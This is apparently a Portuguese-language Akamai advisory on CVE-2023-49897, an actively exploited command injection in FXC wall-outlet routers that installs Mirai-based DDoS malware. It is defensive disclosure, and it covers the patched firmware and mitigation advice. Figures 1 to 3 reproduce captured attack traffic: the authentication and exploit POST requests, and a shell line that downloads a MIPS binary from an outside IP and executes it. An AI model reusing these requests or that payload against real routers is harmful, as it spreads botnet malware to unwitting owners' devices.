Vulnerabilidade explorada ativamente em roteadores FXC: corrigida, patches disponíveis
Esta publicação de blog é uma atualização de uma publicação anterior feita pela SIRT na campanha do InfectedSlurs
Resumo executivo
A SIRT (equipe de resposta de inteligência de segurança) da Akamai emitiu uma atualização para a série informativa do InfectedSlurs agora que um dos fornecedores afetados lançou versões de firmware corrigidas e orientações.
A vulnerabilidade recebeu o ID CVE de CVE-2023-49897 com uma pontuação CVSS v3 de 8,0.
Entre os roteadores afetados estão os roteadores de tomada Future X Communications (FXC) AE1021 e AE1021PE, executando versões de firmware 2.0.9 e anteriores.
As cargas úteis mal-intencionados capturadas em ambientes reais instalam um malware baseado em Mirai com a intenção de criar uma botnet de DDoS (negação de serviço distribuída) .
Fornecemos uma lista extensa de indicadores de comprometimento (IOCs), regras de classificação e regras YARA na pesquisa original para ajudar a identificar essas tentativas de exploração em ambientes reais e possíveis infecções ativas nas redes de defesa.
É importante saber
Como parte da descoberta da InfectedSlurs, a SIRT identificou uma vulnerabilidade nos roteadores de tomada FXC AE1021 e AE1021PE que está sendo explorada ativa e livremente. Este dispositivo é descrito como um roteador LAN sem fio que utiliza tomada para hotéis e unidades residenciais. Ele é fabricado no Japão pela FXC. Essa vulnerabilidade recebeu o ID CVE de CVE-2023-49897 com uma pontuação CVSS v3 de 8,0.
A vulnerabilidade permite que um invasor autenticado obtenha injeção de comando do sistema operacional com uma carga útil entregue por meio de uma solicitação de POST à interface de gerenciamento. Em sua configuração atual, ele está utilizando credenciais padrão do dispositivo nas cargas úteis capturadas.
As versões de firmware afetadas são:
AE1021PE versão de firmware 2.0.9 e anterior
AE1021 versão de firmware 2.0.9 e anterior
O fornecedor (FXC) lançou uma versão corrigida do firmware do dispositivo que corrige a vulnerabilidade. O fornecedor sugere que os proprietários de dispositivos atualizem para a versão de firmware 2.0.10 o mais rápido possível. Eles também recomendam que os proprietários façam uma redefinição de fábrica do dispositivo e alterem a senha de login da tela de gerenciamento padrão na primeira inicialização.
O comunicado do fornecedor pode ser encontrado em https://www.fxc.jp/news/20231206 e há também um comunicado sendo publicado pela JPCERT, que está localizado aqui https://jvn.jp/en/vu/JVNVU92152057/ (Versão japonesa: https://jvn.jp/vu/JVNVU92152057/).
Exploração observada
As cargas úteis identificadas em ambiente real envolvem a instalação de um malware baseado em Mirai. A campanha está criando um botnet com o objetivo de facilitar ataques de DDoS. O botnet em si foi abordado em detalhes em nossa publicação inicial.
É difícil estimar quantos dispositivos no mundo real são potencialmente comprometidos ou ativamente porque as cargas úteis de ataque capturadas dependem do uso de credenciais de autenticação padrão de fábrica pelos dispositivos.
Como o invasor precisa ser autenticado, duas interações exclusivas geradas pelo invasor foram observadas. Acreditamos que a primeira dessas interações é apenas uma tentativa de impressão digital. A interação é direcionada ao URL de ponto de extremidade /cgi-bin/login.apply usando credenciais padrão (Figura 1).
URL: /cgi-bin/login.apply
Cookie: cookieno=489646; username=[redacted]; password=[redacted]
User-Agent: Go-http-client/1.1
POST BODY:
username_input=[redacted]&password_input=. [redacted]&lang=ja_JP&hashstr=202310281340&username=[redacted]&password=[redacted]
Fig. 1: Tentativa de autenticação do roteador de parede de saída FXC
Se a autenticação for bem-sucedida, uma carga útil de exploração será entregue ao URL de ponto de extremidade /cgi-bin/action aproximadamente três segundos depois (Figura 2).
URL:/cgi-bin/action
Cookie: username=[redacted]; password=[redacted]; cookieno=489646
User-Agent: Go-http-client/1.1
POST BODY:
page_suc=i_system_reboot.htm&system.general.datetime=&ntp.general.hostname=[RCE]&ntp.general.dst=0&ntp.general.dst.adjust=0&system.general.timezone=09:00&system.general.tzname=Tokyo&ntp.general.enable=1
Fig. 2: Tentativa de exploração do roteador de parede de saída FXC
As cargas úteis de exploração brutas capturadas na tentativa real de aproveitar a vulnerabilidade de injeção de comando do SO para distribuir uma variante compilada por MIPS do Mirai (Figura 3).
cd /tmp; rm -rf mips; wget http://45.142.182.96/spl/mips; chmod 777 mips; ./mips accessedge
Fig. 3: Cargas úteis de execução remota de código observadas no ambiente real
Em nossa publicação inicial, a equipe de SIRT da Akamai forneceu uma extensa lista de IOCs, regras de Snort e regras YARA para ajudar a identificar essas tentativas de exploração em infecções ativas reais e possíveis nas redes de defesa.
Conclusão
Campanhas direcionadas à Internet das coisas (IoT) resultam em inúmeras instâncias em que os dispositivos de consumo do dia a dia são involuntariamente listados em vários esforços mal-intencionados. Botnets de DDoS e esquemas de criptomineração são apenas alguns dos possíveis resultados que podem acontecer de forma completamente desconhecida para o consumidor cujo dispositivo é afetado. Em alguns casos, o usuário pode nem mesmo saber que as credenciais podem ser alteradas nesses dispositivos.
Essa revelação ressalta a necessidade de uma maior conscientização e educação sobre as melhores práticas de IoT e os riscos associados para o consumidor médio. A necessidade de conscientização não é exclusiva para os consumidores. Ela também se aplica aos fabricantes desses dispositivos "configure e esqueça".
As práticas básicas de segurança são importantes
O básico é importante. Essas observações enfatizam mais uma vez a importância das práticas recomendadas básicas de segurança, como a alteração de senhas padrão em dispositivos durante a configuração inicial. Eles também destacam a importância de implementar protocolos de segurança proativos e de longo prazo ainda mais fortes, como garantir a atualização consistente de sistemas para proteção contra possíveis ataques e, ocasionalmente, fazer check-in nos sistemas/dispositivos, especialmente se eles estiverem exibindo um comportamento estranho.
Fique atento
O Akamai Security Intelligence Group continuará a monitorar e reportar ameaças como essas para promover a conscientização de nossos clientes e da comunidade de segurança em geral. Para mais pesquisas, siga-nos no X, antigo Twitter, para ficar a par do que estamos observando por aí.
O SIRT da Akamai gostaria de agradecer à CISA, à US-CERT, à JPCERT e à FXC pela assistência com comunicações, coordenação, identificação, remediação e esforços de divulgação.
Também gostaríamos de agradecer a Ryu Kuki, Takayuki Sasakie Katsunari Yoshioka da Universidade Nacional de Yokohama pelo seu trabalho diligente. Apesar de não trabalharmos diretamente com eles, foi trazido à nossa atenção que eles tinham relatado a mesma vulnerabilidade à JPCERT e à FXC aproximadamente ao mesmo tempo que nossos próprios relatórios. É sempre ótimo encontrar defensores que assumem funções ativas para tornar a Internet um local melhor e mais seguro para todos.
